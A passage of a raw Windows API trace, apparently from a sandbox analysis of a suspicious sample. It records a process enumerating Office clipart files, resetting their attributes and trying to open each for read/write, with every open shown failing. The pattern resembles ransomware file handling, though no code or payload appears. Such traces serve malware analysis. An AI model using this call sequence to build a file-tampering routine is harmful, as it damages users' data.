returned 0x350000 [0133.851] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF", dwFileAttributes=0x80) returned 0 [0133.851] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.852] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.852] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.852] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.852] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.852] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF", dwFileAttributes=0x80) returned 0 [0133.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.852] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.852] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.852] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.852] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.853] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF", dwFileAttributes=0x80) returned 0 [0133.853] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.853] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.853] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.853] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.853] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.853] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF", dwFileAttributes=0x80) returned 0 [0133.853] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.853] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.853] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.853] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.853] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.854] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF", dwFileAttributes=0x80) returned 0 [0133.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.854] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.854] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.854] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.854] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.854] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF", dwFileAttributes=0x80) returned 0 [0133.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.854] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.855] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.855] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.855] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.855] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF", dwFileAttributes=0x80) returned 0 [0133.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.856] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.856] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.856] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.856] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.856] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF", dwFileAttributes=0x80) returned 0 [0133.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.856] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.856] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.856] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.856] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.857] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF", dwFileAttributes=0x80) returned 0 [0133.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.857] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.857] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.857] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.857] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.858] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF", dwFileAttributes=0x80) returned 0 [0133.858] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.858] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.858] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.858] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.858] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.858] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF", dwFileAttributes=0x80) returned 0 [0133.858] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.858] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.858] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.858] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.859] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.859] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF", dwFileAttributes=0x80) returned 0 [0133.859] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.859] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.859] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.859] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.859] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.859] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF", dwFileAttributes=0x80) returned 0 [0133.859] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.859] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.859] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.860] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.860] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.860] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF", dwFileAttributes=0x80) returned 0 [0133.860] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.861] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.861] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.861] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.861] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.861] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF", dwFileAttributes=0x80) returned 0 [0133.861] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04191_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.861] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.861] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.861] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.861] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.862] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF", dwFileAttributes=0x80) returned 0 [0133.862] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04195_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.862] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.862] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.862] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.862] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.862] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF", dwFileAttributes=0x80) returned 0 [0133.862] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04196_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.862] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.863] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.863] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.863] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.863] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF", dwFileAttributes=0x80) returned 0 [0133.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04206_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.864] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.864] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.864] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.864] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.864] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF", dwFileAttributes=0x80) returned 0 [0133.864] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04225_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.864] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.864] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.864] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.864] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.865] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF", dwFileAttributes=0x80) returned 0 [0133.865] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.865] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.865] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.865] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.865] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.865] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF", dwFileAttributes=0x80) returned 0 [0133.865] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.865] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.865] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.866] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.866] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.866] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF", dwFileAttributes=0x80) returned 0 [0133.866] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.866] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.866] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.867] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.867] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.867] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF", dwFileAttributes=0x80) returned 0 [0133.867] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.868] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.868] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.868] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.868] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.868] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF", dwFileAttributes=0x80) returned 0 [0133.868] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.868] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.868] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.868] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.868] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.869] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF", dwFileAttributes=0x80) returned 0 [0133.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04332_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.871] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.871] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.871] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.871] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.871] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF", dwFileAttributes=0x80) returned 0 [0133.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04355_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.871] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.871] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.872] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.872] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.872] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF", dwFileAttributes=0x80) returned 0 [0133.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04369_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.872] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.872] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.872] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.872] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.872] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF", dwFileAttributes=0x80) returned 0 [0133.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04384_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.872] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.873] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.873] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.873] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.873] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF", dwFileAttributes=0x80) returned 0 [0133.873] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.873] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.873] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.873] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.873] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.873] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID", dwFileAttributes=0x80) returned 0 [0133.873] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\baby_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.874] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.874] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.874] FindNextFileW (in: hFindFile=0x3bd480, 